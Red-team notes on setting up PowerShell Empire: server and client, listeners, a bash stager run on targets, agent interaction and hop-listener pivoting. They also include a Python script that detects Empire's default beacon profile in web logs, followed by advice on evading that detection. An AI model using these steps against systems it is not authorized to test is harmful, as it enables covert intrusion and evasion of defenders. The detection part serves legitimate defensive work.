PowerShell Empire

  • Start the Empire server (on a red team this usually runs on a cloud instance that the whole team connects to)

    • sudo powershell-empire server

  • Start the Empire client (by default it connects to a server on localhost)

    • powershell-empire client

    • to connect to a server running elsewhere, such as the cloud instance, add the server's hostname and credentials to the end:

    • powershell-empire client HOSTNAME --username=USERNAME --password=PASSWORD

  • Starkiller, the GUI front end, can be started by running "starkiller" in the terminal

    • this brings up a GUI that logs in to the same server API the client uses

    • the default credentials are empireadmin / password123; they are public knowledge, so change them before the server is reachable from anywhere but the team's own hosts

  • Choose a listener type

    • uselistener http

  • at a minimum set Host and Port in the options (run 'options' to see them; option names are case sensitive, so use them exactly as 'options' prints them)

    • set Name CLIHTTP (the stager created next refers to the listener by this name)

    • set Host <ip the target can reach> (for a cloud server this is its public address, not a private interface)

    • set Port 8000

    • run 'execute' to start the listener; 'listeners' confirms it is running

  • stagers are the first-stage payloads: when a stager runs on a target it connects back to a waiting listener and the server registers an agent for that host

    • usestager multi/bash

    • at a minimum set Listener to the name of the listener created earlier

    • set Listener CLIHTTP

    • run 'execute' to generate the stager; for multi/bash this prints a bash script to run on the target

  • run the stager code on the target; the agent should then check in with the Empire server, and the client prints a notice when it does.

  • running 'agents' in the client lists every agent we can interact with; 'interact <agent name>' opens a session with one of them

  • hop listeners (the http_hop listener type) can be used for pivoting: a compromised host in the target network relays the agent's traffic to the real listener, so the final target never talks to the Empire server directly
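The check-in above goes over HTTP in the shape given by the listener's DefaultProfile option, and the profile Empire ships by default (the URIs /admin/get.php, /news.php and /login/process.php with an Internet Explorer 11 User-Agent) is widely signatured, as are the fixed-interval beacons produced when DefaultDelay and DefaultJitter are left alone. The following is an added example, not code from these notes or from the Empire project, showing what a defender can pull out of ordinary web or proxy logs when a listener is left on its defaults. It assumes logs in the Apache/nginx combined format; the log lines are constructed for the example.

```python
# Added example (not part of the original notes or of Empire): spotting agent
# check-ins that use an Empire http listener's profile in web/proxy logs.
import re
from collections import defaultdict
from datetime import datetime

# Empire's http listener ships this DefaultProfile. The profile format is
# "uri1,uri2,...|User-Agent|Header:Value|..." (extra headers are optional).
DEFAULT_PROFILE = (
    "/admin/get.php,/news.php,/login/process.php|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)

# Apache/nginx "combined" access-log layout (assumed log format for this example).
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one beaconing host (10.0.0.5) on the default profile,
# one normal browser, and one curl hit on a profile URI with the wrong User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /admin/get.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0"',
    '10.0.0.5 - - [10/Oct/2023:13:56:36 +0000] "GET /news.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '10.0.0.5 - - [10/Oct/2023:13:57:36 +0000] "POST /login/process.php HTTP/1.1" 200 64 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '10.0.0.9 - - [10/Oct/2023:13:58:00 +0000] "GET /news.php HTTP/1.1" 404 0 "-" "curl/8.1.0"',
]


def parse_profile(profile):
    """Split an Empire-style profile string into (uris, user_agent, headers)."""
    parts = profile.split("|")
    uris = {u.strip() for u in parts[0].split(",") if u.strip()}
    user_agent = parts[1].strip() if len(parts) > 1 else ""
    headers = {}
    for extra in parts[2:]:
        if ":" in extra:
            name, value = extra.split(":", 1)
            headers[name.strip()] = value.strip()
    return uris, user_agent, headers


def find_checkins(lines, profile=DEFAULT_PROFILE):
    """Return (src_ip, timestamp, path) for every request that hits a profile
    URI with the profile's exact User-Agent. Both must match: the URI alone
    would also catch scanners, the User-Agent alone would catch real IE11 users."""
    uris, user_agent, _headers = parse_profile(profile)
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path").split("?", 1)[0]
        if path in uris and m.group("ua") == user_agent:
            ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            hits.append((m.group("src"), ts, path))
    return hits


def beacon_intervals(hits):
    """Seconds between successive check-ins from each source. A flat run of
    identical intervals is the agent's sleep (DefaultDelay) with no jitter."""
    by_src = defaultdict(list)
    for src, ts, _path in hits:
        by_src[src].append(ts)
    intervals = {}
    for src, times in by_src.items():
        times.sort()
        intervals[src] = [int((later - earlier).total_seconds())
                          for earlier, later in zip(times, times[1:])]
    return intervals


if __name__ == "__main__":
    checkins = find_checkins(SAMPLE_LOG)
    for src, ts, path in checkins:
        print(f"{src} {ts.isoformat()} {path}")
    print(beacon_intervals(checkins))
```

Against the constructed log this reports three check-ins from 10.0.0.5 sixty seconds apart and ignores the curl request, which hit a profile URI with a different User-Agent. Setting DefaultProfile to URIs and a User-Agent that fit the target environment, and giving the agent a non-zero DefaultJitter, defeats this particular check; do it when the listener is created, before generating the stager.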
